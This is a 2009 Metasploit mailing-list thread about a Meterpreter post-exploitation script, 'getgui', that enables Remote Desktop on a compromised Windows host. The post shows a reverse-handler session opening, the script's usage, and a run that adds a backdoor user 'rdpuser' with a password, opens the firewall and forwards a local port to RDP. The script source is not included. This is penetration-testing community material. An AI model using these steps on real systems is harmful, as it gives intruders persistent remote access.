Metasploit mailing list archives
Meterpreter script for enabled Remote Desktop
From: natron at invisibledenizen.org (natron)
Date: Sat, 3 Jan 2009 17:54:33 -0600
I extended this a tad to automatically forward a local port to the remote 3389 service. I copied in the relevant code from lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb and it seems to work just fine. FYI, any accounts created through use of the getgui script only have user access on the machine; you'll still want to manually drop it into any groups you like. -n [*] Handler binding to LHOST 192.168.206.128 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 2 opened (192.168.206.128:4444 -> 192.168.206.1:2014) meterpreter > run getgui -h Windows Get GUI Meterpreter Script by Darkoperator Carlos Perez carlos_perez at darkoperator.com Usage: getgui -u <username> -p <password> -n <lport> OPTIONS: -h <opt> Help menu. -n <opt> The local port used to forward traffic to the enabled remote desktop port. -p <opt> The Password of the user to add. -u <opt> The Username of the user to add. Windows Remote Desktop Configuration Meterpreter Script by Darkoperator Carlos Perez carlos_perez at darkoperator.com Usage: getgui -u <username> -p <password> -n <lport> OPTIONS: -h <opt> Help menu. -n <opt> The local port used to forward traffic to the enabled remote desktop port. -p <opt> The Password of the user to add. -u <opt> The Username of the user to add. meterpreter > run getgui -n 53389 -u rdpuser -p rdppassword [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez at darkoperator.com [*] Enabling Remote Desktop [*] RDP is already enabled [*] Setting Terminal Services service startup mode [*] Terminal Services service is already set to auto [*] Opening port in local firewall if necessary [*] Setting user account for logon [*] Adding User: rdpuser with Password: rdppassword [*] Adding User: rdpuser to local group Remote Desktop Users [*] You can now login with the created user [*] Local TCP relay created: 0.0.0.0:53389 <-> 127.0.0.1:3389 meterpreter > 2009/1/2 Carlos Perez <carlos_perez at darkoperator.com>:
Glad you guys liked my scripts. for updates on the scripts I tend to post them in my blog, in the forum for Remote-exploit and the forums at pauldotcom.com 2009/1/2 Rob Fuller <mubix at room362.com>Darkoperator also made a windows enumeration script. http://forum.pauldotcom.com/viewtopic.php?id=151 2009/1/2 H D Moore <hdm at metasploit.com>Nice implementation by Carlos Perez: http://forums.remote-exploit.org/showthread.php?t=19205 _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework_______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework_______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
-------------- next part -------------- A non-text attachment was scrubbed... Name: getgui.rb Type: application/octet-stream Size: 5988 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090103/2a405d6a/attachment.obj>
Current thread:
- Meterpreter script for enabled Remote Desktop H D Moore (Jan 02)
- Meterpreter script for enabled Remote Desktop Rob Fuller (Jan 02)
- Meterpreter script for enabled Remote Desktop Carlos Perez (Jan 02)
- Meterpreter script for enabled Remote Desktop natron (Jan 03)
- Meterpreter script for enabled Remote Desktop Carlos Perez (Jan 03)
- Meterpreter script for enabled Remote Desktop Carlos Perez (Jan 02)
- Meterpreter script for enabled Remote Desktop Rob Fuller (Jan 02)